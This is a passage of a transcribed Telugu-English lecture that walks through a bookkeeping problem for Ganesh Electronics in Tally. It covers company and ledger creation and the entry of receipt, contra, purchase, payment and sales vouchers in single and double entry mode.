మీకు. ఓకే, ఆ ప్రాబ్లమ్ ని టోటల్ గా కంప్లీట్ చేస్తాం. ఇఫ్ పాసిబుల్ టుడే వీఆర్ గోయింగ్ టు కంప్లీట్ టుడే, ఇఫ్ నాట్ ద సేమ్ విల్ బి కంటిన్యూడ్ ఇన్ ద నెక్స్ట్ క్లాస్. ఓకే, సో ప్లీజ్ సీ ద స్క్రీన్. రైట్. సో హియర్ ఐఎమ్ షోయింగ్ వన్ ప్రాబ్లమ్. దిస్ ఈస్ గణేష్ ఎలక్ట్రానిక్స్. రైట్. సో గణేష్ ఎలక్ట్రానిక్స్ అన్న వాళ్ళ ఒక ట్రాన్సాక్షన్స్ ఇవన్నీ అన్నమాట. ఓకే, దీస్ ఆర్ ద ట్రాన్సాక్షన్స్ ఆఫ్ గణపతి ట్రేడింగ్ కంపెనీ. రైట్. కొంచెం జూమ్ చేశాను, సో యూ క్యాన్ హ్యావ్ ఎ లుక్ ఆఫ్ ఇట్. ఓకే, దీస్ ఆర్ ద ట్రాన్సాక్షన్స్, దీస్ ఆర్ ద అడ్జస్ట్మెంట్స్ అండ్ దీస్ ఆర్ ద ఆన్సర్స్. ఓకే, మీకు ఇవి ట్రాన్సాక్షన్స్ ఉన్నాయి. సో యూ హ్యావ్ ట్రాన్సాక్షన్స్. ఓకే, you have adjustments and you have answers. Then how to do this in Tally we are going to see now. So as we discussed that accounting process have 5 steps. That is step number 1 creation of company, step number 2 creation of ledgers, step number 3 creation of inventory, step number 4 voucher entry and step number 5 reports. Right. So first, this is an company, Ganesh, name called Ganesh Electronics. So first we are going to create the company. So how to create a company? Alt F3, go for create company. Okay, and write the name Ganesh Electronics. Okay, just name I am writing as Vijayawada. Okay, state is Andhra Pradesh. So now phone number and all I am writing here. Right. I don't want to use any passwords here, so I am not using password here.
So the first step, creation of company, we have done with that, right? The next step is creation of ledger accounts. So what are the ledger accounts we have to create now? Okay. So Mr. Ganesh started business with cash. Okay. Amount is 5 lakhs. Okay. First we have to create here Ganesh account. Okay. So how to create the ledger accounts? Accounting info, ledgers, create Ganesh capital account under capital. Okay. Next one is open bank account with SBI Karkhana branch. SBI bank account, SBI bank under bank accounts. Okay. Next one, purchase goods from Sony Enterprises. So entry banana some purchase account data to Sony Enterprises. So purchase under purchase accounts. Okay, purchase goods from Sony Enterprises. So we are purchasing, so it comes under sundry creditors. So the purchase goods from Shah Enterprises. So already purchase account create chesam kabatti. Now we are going to create Shah Enterprises under sundry creditors. Right? Purchase furniture for business use and issue check. So ikkada purchase goods annamu, andike purchase account create chesamu. Ikkada purchase furniture. So furniture is an item, right? Furniture comes under real account. So furniture is an item. So it's an asset. So create furniture account under fixed assets. Okay, here ikkada manam issue check annam. Okay, so when check issue chesam kabatti already check ante the amount goes from bank. So already we have created SBI bank account, right? Next one is sold goods for cash. So sold goods for cash and entry vastundi cash account data to sales. So already మన దగ్గర cash account ఉంటుంది. There is no need to create. We have to create only sales account under sales. Right? Next one, sold goods and received check. So sales account already create చేసాం. Check అంటే bank already bank account create చేసాం. Next one is sold goods and received check. So already sales account చేసాము. Check account ఉంది. Paid for transportation on purchases. So we have to create transportation on purchase under direct expense. Okay. Alage next one ఏముంది? Transportation on sales. Transportation on sales under indirect expense. That's paid for office expenses. So create office expenses under indirect expense. Next, paid for advertisement under indirect expense. Next, sold goods already we have created. Again, sold goods already we have created. Shop rent paid shop rent. We have to create shop rent under indirect expense. Next, electricity charges under indirect expense. Telephone charges under indirect expense. Commission under indirect expense. Cash withdrawn for office use. So office lo kochindi cash kabatti entry cash account to bank. Already cash account will be default entirely. Bank account we have already created. Next one is paid salaries under indirect expense.
Next, closing stock. Okay, so please put in mind closing stock కొంచెం డిఫరెంట్ గా ఎంట్రీ చేయాల్సి ఉంటుంది. సో క్లోజింగ్ స్టాక్ ని మనం తర్వాత క్రియేట్ చేస్తాం. ఓకే, తర్వాత ఎలక్ట్రిసిటీ చార్జెస్ పేయబుల్. So payables all comes under provision. So we are making a provision. Okay. Next one, salaries payable. So this is also comes under provisions. Next, shop rent payable. It also comes under provisions. As depreciation on furniture, if you want write depreciation on furniture, or you can write only depreciation. So depreciation on furniture comes under indirect expense. The gross profit, net profit, balance sheet answers we have to get, right? So students, we have created the first step, two steps we have completed, that is creation of ledger accounts, creation of company and creation of ledger accounts, right? So these two we have completed. Okay, the next one is stock. So in this problem we don't have inventory, right? So ఈ ప్రాబ్లంలో అంటే మనం ట్రాన్సాక్షన్స్ అబ్జర్వ్ చేస్తే కనుక సోల్డ్ గూడ్స్ ఫర్ క్యాష్, సోల్డ్ గూడ్స్ ఫర్ క్యాష్, పర్చేస్ సోల్డ్ గూడ్స్ అండ్ రిసీవ్డ్ చెక్, పర్చేస్ గూడ్స్ ఫ్రమ్ సోనీ ఎంటర్ప్రైజెస్, పర్చేస్ గూడ్స్ ఫ్రమ్ షా ఎంటర్ప్రైజెస్ అనేసి వచ్చింది. అంతేగాని ఆ సేల్స్ లో మనం ఏం సేల్ చేస్తున్నాము, పలానా ఐటమ్ అనేది లేదు. సో ఇన్ ద ట్రాన్సాక్షన్స్ విచ్ ఆర్ గివెన్, దే హ్యావ్ నాట్ మెన్షన్ ఎనీ inventory particulars like what we are purchasing, the stock items. The same way what we have sold, the stock items are not mentioned in the given problem. So we have to consider this problem as without inventory. So there is no creation of inventory. Okay, so we can skip the third step, that is creation of inventory. So we are going to solve an inventory also in the next classes. So first I want to discuss about without inventory, then we come to inventory. So why I am you suggesting, because why I am teaching you both with inventory and without inventory, because in your syllabus, BCom syllabus, or it may be some problem is given to you and they may ask to solve you. అంటే మీరు చదువుకునే సిలబస్లో కనుక చూస్తే అక్కడ మీకు ఒక ట్రయల్ బ్యాలెన్స్ ఇచ్చేసి వాటికి అడ్జస్ట్మెంట్స్ ఇచ్చేసి దానికి ట్రేడింగ్ అండ్ ప్రాఫిట్ అండ్ లాస్ అకౌంట్ చేయించమని అడుగుతారు, అవునా? అలా ఉండే ఛాన్సెస్ ఉన్నాయి. ఓకే, అక్కడ ఇన్వెంటరీకి ఉండే ఛాన్సెస్ ఉండవు. సో మనము అంటే ఇన్వెంటరీ కూడా అడగచ్చు. సో ఫస్ట్ వీఆర్ గోయింగ్ టు డిస్కస్ అబౌట్ ద ఇన్వెంటరీ, without inventory, then afterwards we are going to see the without inventory. Okay, so now the first two steps completed. The third step we can skip as there is no inventory. The fourth step is voucher entry, right? We have to be very careful while recording the voucher entry. First you have to classify that. First read the transactions and think whether the cash is coming in or going out, whether check is coming in or going out, we are selling or purchasing, or it's to be depositing cash or withdrawing cash, whatever. First you observe it. Okay, ఫస్ట్ ట్రాన్సాక్షన్ చదివి అది మనకి రిసిప్ట్లో వస్తుందా, పేమెంట్లో వస్తుందా, క్యాష్ వస్తుందా, క్యాష్ పోతుందా, చెక్ వస్తుందా, చెక్ పోతుందా అని ఆలోచించండి. దాన్ని బేస్ చేసుకొని మనం ట్రాన్సాక్షన్ చేయాల్సి ఉంటుంది. ఓకే, నౌ సీ ద స్క్రీన్, వీఆర్ గోయింగ్ టు డూ దట్ ప్రాబ్లమ్, రైట్? సో హియర్ మిస్టర్ గణేష్ స్టార్టెడ్ బిజినెస్ విత్ క్యాష్, రైట్? సో హౌ టు డూ దిస్? Mr. Ganesh started business with cash. Already మనం గణేష్ అకౌంట్ క్రియేట్ చేసాము, క్యాష్ అకౌంట్ డిఫాల్ట్ టాలీలో ఉంటుంది. సో వెన్ వీఆర్ స్టార్టింగ్ ద బిజినెస్, ఓకే, అంటే గణేష్ బిజినెస్ స్టార్ట్ చేసినప్పుడు మనకేమవుతుంది, క్యాష్ అనేది ఇన్వాల్వ్ అవుతుంది. క్యాష్ విల్ కమింగ్ ఇన్, రైట్? సో కమ్ టు ట్రాన్సాక్షన్స్, గో టు వోచర్ ఎంట్రీ. ఓకే,
Then here which voucher? So ఏ voucher ఎంట్రీ చేయాలి, ఎలా చూడాలి? గణేష్ స్టార్టెడ్ బిజినెస్ విత్ క్యాష్. అంటే గణేష్ అనే వ్యక్తి బిజినెస్ స్టార్ట్ చేశాడు. సో బిజినెస్ స్టార్ట్ చేస్తే తన ఇన్వెస్ట్మెంట్ బిజినెస్ లో పెట్టాలి, అంటే బిజినెస్ కి డబ్బులు ఇవ్వాలి. అంటే గణేష్ ఏం చేస్తాడు, తన పెట్టుబడిని మన బిజినెస్ లో పెడతాడు. సో బిజినెస్ నుండి ఆలోచిస్తే క్యాష్ ఇస్ కమింగ్ ఇన్. సో వీ హ్యావ్ టు రైట్. సో క్యాష్ ఇస్ కమింగ్ ఇన్, గో ఫర్ రిసీట్ వౌచర్. ఓకే, go for receipt voucher. What is the shortcut key for that? You can observe it is F6. So just press F6. Now it is asking account cash. Okay, so tally వాళ్ళు ఏం చేశారు అంటే ఇక్కడ మనకి మనం జనరల్ గా అకౌంట్స్ చదివేటప్పుడు 2 మోడ్స్ అంటే డెబిట్ ఒకటి, క్రెడిట్ ఒకటి, లేదా క్రెడిట్ ఒకటి, డెబిట్ ఒకటి చేస్తాం, రైట్? సో ఇక్కడ టాలీలో 2 మోడ్స్ ఆఫ్ ఎంట్రీస్ ఉంటాయి. ఒకటి సింగిల్ ఎంట్రీ మోడ్, ఒకటి double entry mode. So first we try to post the things in single entry mode. So receipt. So మన డబ్బులు వచ్చినాయి. సో వెరీ సింపుల్ టు అండర్స్టాండ్. సో టాలీ ఎలా డిజైన్ చేశారు అంటే, ఇప్పుడు మనము ఏదైనా ఆర్గనైజేషన్కి వెళ్ళాలనుకోండి, అక్కడ ప్రతి ఒక్కరికి కంపేర్ అంటే ఎవరైనా సరే అంటే ఇప్పుడు ఒక పర్సన్ కి మనం క్యాషియర్ పదవి ఇచ్చాను, క్యాషియర్ డిజిగ్నేషన్ ఉన్నాడు. సో క్యాషియర్ డిజిగ్నేషన్ అంటే అక్కడ ఏముంటుంది, రిసిప్ట్స్ అండ్ పేమెంట్స్ మాత్రమే ఉంటాయి, అవునా? సో ఓన్లీ రిసీట్స్ అండ్ పేమెంట్స్ కి తను ఒక బిగిన్ గ్రాడ్యుయేట్ అనేది అంత అవసరం ఉండదు. సో జస్ట్ డబ్బు వస్తుందా పోతుందా అది మాత్రం తెలిసి సరిపోతుంది. సో అందుకని ఇక్కడ రిసీట్ లో ఏం చేస్తానంటే సింపుల్ గా అండర్స్టాండ్ అవ్వడానికి రిసీట్. సో మనకి ఏం వచ్చింది, క్యాష్ వస్తే క్యాష్ సెలెక్ట్ చేసుకోండి, బ్యాంక్ అంటే చెక్ వస్తే బ్యాంక్ సెలెక్ట్ చేసుకోవాలి. వెరీ సింపుల్ టు అండర్స్టాండ్. ఓకే, వెదర్ వీఆర్ రిసీవింగ్ క్యాష్ దెన్ సెలెక్ట్ క్యాష్ ఇన్ అకౌంట్. ఓకే, వీఆర్ గెటింగ్ చెక్ దెన్ సెలెక్ట్ bank in account. So here we are receiving cash, so I am selecting cash. Then who is giving this? Evaru icharu? So Ganesh ichadu. Then just select the Ganesh account. What is the amount he has given? 5 lakhs. Okay, ante simple. Ganesh started business with cash. You can write the narration. Right, this is called single entry. So once again repeating, so in single entry mode just you can select cash and who is giving. అంటే సింపుల్ గా క్యాష్ వచ్చిందా, అంటే రిసీట్ అంటే ఏం వచ్చింది, క్యాష్ వచ్చింది, జస్ట్ సెలెక్ట్ చేసుకోండి క్యాష్. ఓకే, ఎవరు ఇచ్చారు వాళ్ళ నేమ్ సెలెక్ట్ చేసుకుంటారు. దట్ ఈస్ వెరీ సింపుల్. సో ఈ విధంగా మనకి మన అకౌంటెంట్ కైనా అంటే ద పర్సన్ హూ ఇస్ ఫ్రమ్ బీకామ్ బ్యాక్గ్రౌండ్, the person who is not from BCom background also, it's very easy to understand. So receipt mode అంటే మనకు రెండే కదా, ఒకటి వచ్చేది క్యాష్ లేదా చెక్. సో ఆ 2 మోడ్స్ లో మీకు ఏది ఉంటే క్యాష్ వస్తే క్యాష్ సెలెక్ట్ చేసుకోండి, చెక్ వస్తే బ్యాంక్ సెలెక్ట్ చేసుకొని ఎవరి ఇచ్చారనేది ఎంట్రీ చేసి ఎంట్రీ చేయండి. దిస్ ఇస్ వెరీ సింపుల్, రైట్? నెక్స్ట్ వన్, ఓపెన్ ద బ్యాంక్ అకౌంట్ విత్ SBI కార్ఖానా బ్రాంచ్. ఓపెన్ ద బ్యాంక్ అకౌంట్ అంటే ఎంట్రీ వస్తుంది క్యాష్ అకౌంట్ డేటా టు బ్యాంక్. సో ఇట్స్ కమ్స్ అండర్ కాంట్రాక్ట్. సో మనం డిస్కస్ చేసింది ఏంటి, కాంట్రాక్ట్ ఎప్పుడు మనం చేస్తాము, క్యాష్ వచ్చినప్పుడు కానీ, క్యాష్ పోయినప్పుడు కానీ, సారీ ఎప్పుడైతే క్యాష్ మనం బ్యాంక్ లో డిపాజిట్ చేస్తామో లేదా బ్యాంక్ నుంచి విత్డ్రా చేస్తామో, ఓకే, ఆ టైంలో మనం ఈ కాంట్రాక్ట్ వచ్చి అనేది యూజ్ చేస్తాము. సో ఇక అకౌంట్. సో హియర్ whatever you are saying is single entry mode. I want double entry mode. Then how to convert into double entry mode? Press F12. Okay, and say no here. Use single entry mode for payment, receipts, contra, voucher. It is yes. Now I want no. I don't want single entry mode. So I am saying no. Okay, so now you can see double entry mode. So please students don't get confused. So man chadukunde entante single entry mode ante ఏదో ఒక డెబిట్ కానీ ఒక క్రెడిట్ కానీ చేయడం ఉంటుంది. డబుల్ ఎంట్రీ మోడ్ అంటే 1 will be debited, 1 will be credited అని చదువుకున్నాం. బట్ టాలీలో సింగిల్ ఎంట్రీ మోడ్ అనేది డబుల్ ఎంట్రీ అంటే మీనింగ్ అది కాదు. సింగిల్ ఎంట్రీ మోడ్ అంటే లైక్ 1 debit can be accepted, multiple credits can be accepted. That is called single entry mode. Or 1 credit can be done, multiple debits can be done. That is called single entry. So ఆ ఎంట్రీస్ కూడా ఏంటనేది ఒకసారి చూపిస్తాను. So first let me complete this contra voucher. Okay, so this is called double entry system. So contra voucher లో క్యాష్ డిపాజిట్ చేసే ఎంట్రీ ఏమొస్తుంది మనకి, క్యాష్ అకౌంట్ డేటా టు బ్యాంక్, టు ఏ బ్యాంక్. సో ఫస్ట్ సెలెక్ట్ బ్యాంక్, టు బ్యాంక్.
So what is the amount we are depositing? 3 lakhs. Okay, by cash. Sorry. So what is the entry? Cash account debtor. So when you are depositing in bank, the entry will be bank account debtor to cash. So select to cash 3 lakhs and by bank 3 lakhs. Okay. Now tally will allow you denominations also. అంటే మీరు ఆ 3 lakhs deposit denominations ఉంటాయి కదా, 2000 notes అని 500 notes అని అలానే ఉంటాయి. So if you have, you can write the denominations. If you don't have, you can skip that. Okay, ఒక error message చూపిస్తుంది, alert message చూపిస్తుంది, ఎంటర్ చేయలేదని. Okay, no issues with that. We can enter. This is called double entry portion. Now purchase goods from Sony Enterprises. Now purchase goods from Sony Enterprises అని ఉంది. So purchase goods, this should be posted in purchase account. Okay, this should be posted in purchase account. Now the whatever the screen you are seeing here, this is called inventory mode. This is called item invoice or inventory invoice, because you can see the item here, name of item, right? But in the given transaction, the items are not mentioned. These items are not mentioned in the sense what mobiles items ante, like the business which you are doing, అంటే మీరు దేంతో బిజినెస్ చేస్తున్నారు, మొబైల్స్ అయితే మొబైల్స్ అలాంటి. సో అలాంటి ఇక్కడ గూడ్స్ అని ఇచ్చాడు. దెన్ ప్లీజ్ ఎంటర్ ఇన్ వోచర్ మోడ్. సో ఇక్కడ అబ్జర్వ్ చేస్తే మీకు ఇక్కడ రైట్ సైడ్ లో అకౌంటింగ్ ఇన్వాయిస్ అని యాజ్ వోచర్ మోడ్ అని ఉంటుంది. సో క్లిక్ ఆన్ యాజ్ వోచర్ మోడ్. సో యాజ్ వోచర్ మోడ్ ఇస్ నథింగ్ బట్ as you are writing your journal entry. So what is the journal entry for? Purchasing the goods. Purchasing the goods ki journal entry emuntundi? Purchase account will be debited, Sony Enterprises will be credited. So debit purchase account, credit Sony Enterprises account. So tally okkati observe cheyandi students endante, so మనం బుక్ లో మనం ఎంట్రీ రాసేటప్పుడు ఫస్ట్ డెబిట్ రాస్తాము, తర్వాత క్రెడిట్ రాస్తాము. అంటే క్యాష్ అకౌంట్ డెటార్ టు బ్యాంక్ ఆర్ పర్చేజ్ అకౌంట్ డెటార్ టు షా. ఇక్కడ పర్చేజ్ అనేది 2 by చూసుకోండి, 2. ఓకే, సో ఇక్కడ ఒకసారి పైన క్రెడిట్ ఉండొచ్చు, కింద డెబిట్ ఉండొచ్చు. ఓకే, సో ప్లీజ్ డోంట్ అప్లై, అంటే పైన రాసింది ఫస్ట్ రాసింది ఎప్పుడు డెబిట్, తర్వాత రాసింది ఎప్పుడు క్రెడిట్ అని డిసైడ్ అవ్వకండి. సో యూ ప్లీజ్ సీ దిస్ 2 and by. ఓకే, సో ఇన్స్టెడ్ ఆఫ్ 2 and by, if you're getting confused with 2 and by, 2 అంటే క్రెడిట్, బై అంటే డెబిట్ అని కన్ఫ్యూజ్ అవుతే గనక you can change this also like DRCR. And how to change that? So whatever you want to make any configuration settings and changes, please click on F12 and read. So here you can see that use CRDR instead of 2 by. Yes, I want CRDR instead of 2 and by. So CR అంటే క్రెడిట్, DR and డెబిట్ అని అందరికి ఈజీ అర్థమవుతుంది. సో ఇక డెబిట్ ఏం చేయాలి, క్రెడిట్ ఏం చేయాలి? డెబిట్ ఈస్ పర్చేస్ అకౌంట్, క్రెడిట్ ఈస్ సోనీ ఎంటర్ప్రైజెస్. సో ప్లీజ్ క్రెడిట్ సోనీ ఎంటర్ప్రైజెస్. సో మనం రాసిన ఫస్ట్ డెబిట్ ఏ ఉంటుంది, బట్ టైల్ అప్పుడప్పుడు క్రెడిట్ ఫస్ట్ ఉండొచ్చు, డెబిట్ సెకండ్ కూడా ఉండొచ్చు. సో ప్లీజ్ కాన్సన్ట్రేట్ ఆన్ దిస్ డిఆర్ అండ్ సిఆర్. సో క్రెడిట్ ఈస్ సోనీ ఎంటర్ప్రైజెస్, సెలెక్ట్ సోనీ ఎంటర్ప్రైజెస్, అమౌంట్ ఈస్ 1 lakh. Okay, debit is purchase. So if you want, you can have the items here. If you don't want, then just press enter. So it will allows you. Okay, if you are doing inventory mode, okay, if you are doing in inventory mode, tally does not move without that. Bean goods purchased. Okay, suppose me the next time in the purchase goods from Shah Enterprises, right? If I am doing an item invoice, if I am doing in item invoice, okay, party name you can select Shah Enterprises. Okay, purchase account. Now you want item, then see there is no item, so tally does not move. Tally అనేది ఇంకా మనకు చేయడం ఛాన్స్ యాక్సెప్ట్ చేయదు. సో అందుకని మనం ఏం చేస్తాము అంటే ఇలాంటి ఏవైతే ట్రాన్సాక్షన్స్ ఉంటాయో వితౌట్ ఇన్వెంటరీ, that can be posted in as voucher mode. The shortcut key for this as voucher mode is Control V. Control V, because you have 2 lines here. So I am pressing Control V. Okay.
So purchase goods from Shah Enterprises. So you have to change the date here, 4th January, because it is an educational mode. Just I am saying on, I am posting all the transactions on 1st April. Okay, Shah. So what should be the entry here? Debit purchase account, credit Shah Enterprises. Debit purchase account, credit Shah Enterprises. Okay, so debit is, credit is Shah Enterprises. Okay, amount is 75,000. Debit is purchase. Don't want any item, then skip that. Okay, alage purchase furniture for business use and issued check. So check issue chesamu. So cash is going out or check is going out. So again here, if you observe that payment voucher, I want to enter in double entry mode. This is called double entry mode. So double entry mode ante DRCA అని వస్తుంది. సింగిల్ ఎంట్రీ మోడ్ అంటే ఇందాక చూసినట్టు మనకి ఇలా వస్తుంది. ఓకే, సింగిల్ ఎంట్రీ అంటే మీరు డబుల్ ఎంట్రీలో కానీ సింగిల్ ఎంట్రీలో ఏ మోడ్లో ఎంట్రీ చేయొచ్చు. ఓకే, సో సింగిల్ ఎంట్రీ కొంచెం ఈజీగా ఉంటుంది అనమాట. సో సపోజ్ బ్యాంక్ పేమెంట్ చేస్తాను. ఓకే, అంటే ఇక్కడ బ్యాంక్ పేమెంట్ చేశాను. ఓకే, ఎవరికి పేమెంట్ చేశాము? Suppose the same thing, payment is there, right? Purchase furniture for business use and issue check. So check ఇచ్చాను, దేనికోసం పేమెంట్ చేశాను? ఫర్నిచర్ కోసం. సో ఫర్నిచర్. ఓకే, వాట్ ఈస్ ద అమౌంట్? 1 lakh. సో 1 lakh సెలెక్ట్ చేసుకున్నాం. అలాగే సో పేమెంట్ అంటే ఏం క్రెడిట్ అవుతుంది? ఆల్వేస్ బ్యాంక్ ఆర్ క్యాష్ విల్ బి క్రెడిటెడ్. సో వాట్ ఎవర్ ద అకౌంట్ యూ ఆర్ టేకింగ్ హియర్, that will automatically credited, and whatever the items you are taking here, the ledgers you are taking here, whatever the ledgers you are taking in this purchase, in this particulars, ఇక్కడ ఏదైతే మీ పర్టికులర్ స్పేస్ లో ఏదైతే అకౌంట్స్ తీసుకుని ఆటోమేటిక్ గా అది క్రెడిట్ అవుతుంది. సపోజ్ లెట్ us say చార్జెస్ యూ విల్ డెబిట్ హియర్. ఓకే, సో ఈ సింగిల్ ఎంట్రీ మోడ్ లో ఒక క్రెడిట్ ఉంది, మల్టిపుల్ డెబిట్స్ ఉన్నాయి. సపోజ్ దిస్ ఫర్నిచర్ ఐ హావ్ పేడ్ ఇన్ క్యాష్ అండ్ క్రెడిట్. సో ఫస్ట్ ఈ ట్రాన్సాక్షన్ కంప్లీట్ చేస్తున్నాను. పర్చేస్ ఫర్నిచర్ ఫర్ బిజినెస్ యూజ్ అండ్ ఇష్యూడ్ చెక్. సో సింపుల్ గా బ్యాంక్ సెలెక్ట్ చేసుకున్నాను, ఇక్కడ ఫర్నిచర్ సెలెక్ట్ చేసుకున్నాను, ఇక్కడ మీరు అమౌంట్ రాసేస్తారు. బీన్ ఫర్నిచర్ పర్చేస్డ్ అండ్ ఇష్యూడ్ చెక్ రాసేస్తాను. సపోజ్ ఫర్ ఎగ్జాంపుల్ ఇదే ఫర్నిచర్ ని మనము కొంచెం క్యాష్ ఇచ్చాము, కొంచెం చెక్ ఇచ్చాము. అప్పుడు మనకు పాసిబిలిటీ ఉందా? ఇక్కడ బ్యాంక్ అనేది సెలెక్ట్ చేసుకోండి. సపోజ్ ఆ 1 lakh ఉందనుకోండి, ఆ ఫర్నిచర్ 1 lakh ఉందనుకోండి, ఆ 1 lakh ని నేను ఏం చేశానంటే 1 lakh 50,000 క్యాష్ ఇచ్చాను, 50,000 చెక్ ఇచ్చాను. ఇక్కడ పాసిబిలిటీ ఉందా మనం రాయడానికి? ఎదర్ బ్యాంక్ you can take, one can be credited, either bank can be credited or cash can be credited. That is only possible in single entry. సో ఇప్పుడు ఛాన్స్ లేదు చూడండి. ఇప్పుడు క్యాష్ ఇస్తే క్యాష్లో వెళ్తుంది అమౌంట్, చెక్ ఇస్తే బ్యాంక్లో వెళ్తుంది, అంతే. సారీ, సో దిస్ క్యాన్ బి డన్. నౌ టు రిజాల్వ్ దిస్ దే హావ్ గివెన్ మల్టిపుల్ ఎంట్రీ. సో ఐఎమ్ పుట్టింగ్ ఇట్ యాజ్ నో. Okay, I'm putting it as no. So I don't want single entry mode. Okay. Now here you can have an advantage. So furniture 1 lakh. So I'm confusing గానే మళ్ళీ చెప్తున్నాను. Okay, I'm converting into double entry mode. I'm converting into double entry mode. So double convert అంటే single entry వస్తుంది, no అంటే double entry mode లో అయిపోతుంది. Okay, I want this. I want in double entry mode. So debit is what? Furniture. So 50,000. So 1 lakh total I'm purchasing with 1 lakh. ఓకే, అలాగే డెబిట్ ఇంకా మల్టిపుల్ డెబిట్స్ కూడా చేసుకోవచ్చు. ఓకే, క్రెడిట్ ఎస్బీఐ బ్యాంక్ లో ఎంత పే చేసావు? 75,000. ఓకే, క్యాష్. సో ఇఫ్ యూ అబ్జర్వ్ దీస్ ట్రాన్సాక్షన్స్, we can do 2 debits, we can do 2 credits, or we can have multiple debits and we can have multiple credits. This is the advantage of double entry mode. Okay, so ఇలాంటి సిచ్యుయేషన్స్ లో ఈ డబుల్ ఎంట్రీ మోడ్స్ యూస్ చేస్తాం. అంటే మీకు 2 డెబిట్స్ కావాలి, 2 క్రెడిట్స్ కావాలి. సో ఇలాంటి సిచ్యుయేషన్ లో పేమెంట్ లో కానీ రిసిప్ట్ లో కానీ
మనము ఈ ఒక ఆప్షన్ ని యూస్ చేసుకుంటాము. ఇఫ్ దెర్ ఈస్ ఓన్లీ సింగిల్ ఎంట్రీ మోడ్ అంటే ఓన్లీ క్యాష్ ఆర్ ఓన్లీ చెక్, then you can go for single entry mode. So I'm not saving this, right? So like this we can enter the single entry and double entry mode system. Now again, sold goods for cash. Okay, now sold అన్నప్పుడు సేల్స్ లోకి వెళ్తాం. So again this is an item invoice. We don't have items here, then what to do now? Go for voucher, as voucher, control V, give the reference number. Okay, debit is what? So sold goods for cash. What is the entry? The entry is cash. Debit is cash. Okay, and credit is sales. That's all. It's very simple. Bin goods sold for cash. Okay, mali same entry again, 25,000. Okay, debit is cash, credit is sales. Okay, 25,000 is the amount. Bin goods sold for cash. Okay, next, sold goods and received check. Sold goods and received check. F8 sales. Sold goods and received check. Entry will be debit, bank account, credit. What is the credit? Sales. Okay, debit, bank account. Okay, what is the amount? 1,50,000. Okay, so instrument number, if you have check number, you can write the check number here. Okay, check number and in details we are going to see in another classes. Okay, so the debit is bank account, credit is sales account. Right, next one is again sold goods and received check. Okay, sold goods and received check, same entry, SBI Bank. Okay, what is the amount? 85,000. Okay, paid transportation on purchases, so payment entry, go for F5 payment. Again it's a double entry mode. What is debit? Transportation purchases. What is the amount? That is 500. What is credit? Cash. Okay, bin charges paid, transportation charges on purchases paid. Right, next one is transportation on sales, so that is also payment. So again if you want, you can have a look into single entry mode. Use single entry mode? Yes, I want single entry mode. Account is what? Cash. For what purpose you are paying? That is on transportation on sales. What is the amount? That is 1,000. Type 1,000. Okay, so again what is the entry? Paid office expenses. So office expense cash, office expenses, that's all. So ikkada single entry mode lo what is debit, what is credit and ఆలోచించే అవసరం ఉండదు. Very simple. Cash is going out, go for payment. Select account as cash and particulars లో ఏ ఎక్స్పెన్సెస్ పేమెంట్ చేస్తున్నారో అది ఎంట్రీ చేసుకోండి, సరిపోతుంది అంతే. అక్కడ డెబిట్ క్రెడిట్ ఆలోచించే అవసరం లేదు. Paid for advertisement, then cash. What purpose you are paying? Advertisement. What is the amount? That is 1,200. Okay, I am not writing the narration. Okay, sold goods, again sold goods, F8 sales. Okay, so again it is item notes, control V for voucher. Okay, sold goods, so debit will be cash. Okay, what is the amount? That is 30,000. Okay, sales is credited. Okay, again next one, again goods sold. Okay, debit is cash. What is the amount? Amount is 20,000. Credit is again sales. Okay, shop rent, paid shop rent,
it's a payment, go for FI payment, what you paid cash, for what ఏం పే చేశారు, షాప్ రెంట్ పే చేసాము, రైట్. ఎంట్రీ ఎంత, what is the amount, 10,000, amount ఎంత 10,000, shall type 10,000, save it. Next one, paid electricity charges, cash, electricity charges, ఎంత పేమెంట్ చేసే electricity charges, 500, okay, 500. Okay, if you want the next one, electricity charges, again telephone charges, right, telephone charges. Like this you can have 2-3 entries also. Okay, ఇలా కూడా పేమెంట్, paid commission. Okay, suppose commission paid అని ఉంది. Okay, if you want to create any account, you can create Alt C and create any account. Okay, commission, so suppose commission ఉంది అక్కడ, so there is a commission, suppose commission account create చేయలేదు అనుకోండి, commission already ఉంది. Okay, Alt C కొట్టుకొని మనము అకౌంట్ కూడా క్రియేట్ చేసుకోవచ్చు అన్నమాట. ఓకే, కమిషన్ అమౌంట్ ఎంత 500. Okay, like this you can bring the expenses paid in cash. Like this you can have payment, అన్ని పేమెంట్స్ అని ఒక చోటు కూడా వేయచ్చు, బట్ దట్ ఈస్ నాట్ ద రైట్ వన్, బికాస్ రియల్ టైంలో అన్ని ఎక్స్పెన్స్ ఒకటేసారి పే చేయము, డిఫరెంట్ గా పే చేస్తాం కాబట్టి అలా రాయడం బెటర్. ఓకే, అగైన్ క్యాష్ విత్డ్రాన్ క్యాష్ ఫర్ ఆఫీస్ యూస్, ఇట్స్ అ కాంట్రా, రైట్. సో ఇక్కడ ఇప్పుడు సింగిల్ ఎంట్రీ మోడ్, విత్డ్రాన్ క్యాష్ ఫర్ ఆఫీస్ యూస్. సో ఇక్కడ డెబిట్ లో ఏం తీసుకోవాలి, కాంట్రా అంటే క్యాష్ డెబిట్ ఉంటుంది, క్రెడిట్ ఉంటుంది. సో ఆల్వేస్ ద అప్పర్ వన్ ఇస్ డెబిట్ హియర్. ఓకే, ఓన్లీ కాంట్రాలో ఇప్పుడు ఈ అకౌంట్ అనేది డెబిట్ అవుతుంది. ఓకే, సో సింపుల్. ఇంకొకటి ఎలా గుర్తుపెట్టుకోవాలి అంటే క్యాష్ విత్డ్రాన్ క్యాష్ ఫర్ ఆఫీస్ యూస్. సో క్యాష్ విత్డ్రా చేసాము, క్యాష్ విత్డ్రా చేసినప్పుడు బ్యాలెన్స్ ఎక్కడ పెరుగుతుంది, క్యాష్ లో పెరుగుతుందా, బ్యాంక్ లో పెరుగుతుందా? సో బ్యాంక్ లో నుంచి మీరు విత్డ్రా చేసినప్పుడు బ్యాంక్ లో అమౌంట్ తగ్గుతుంది, క్యాష్ లో పెరుగుతుంది. సో టైప్ అంటే ఏ బ్యాలెన్స్ అయితే ఇంక్రీజ్ అవుతుందో అది పైన ఉండాలి, ఏ బ్యాలెన్స్ అయితే ఏ అకౌంట్ అయితే బ్యాలెన్స్ తగ్గుతుందో ఆ అకౌంట్ కింద ఉండాలి, ఆ అకౌంట్ పర్టికులర్స్ లో ఉండాలి. ఏ బ్యాలెన్స్ అయితే ఇంక్రీజ్ ఉందో అది అకౌంట్ ప్లేస్ లో ఉండాలి, ఏ బ్యాలెన్స్ అయితే డిక్రీజ్ ఉందో అది 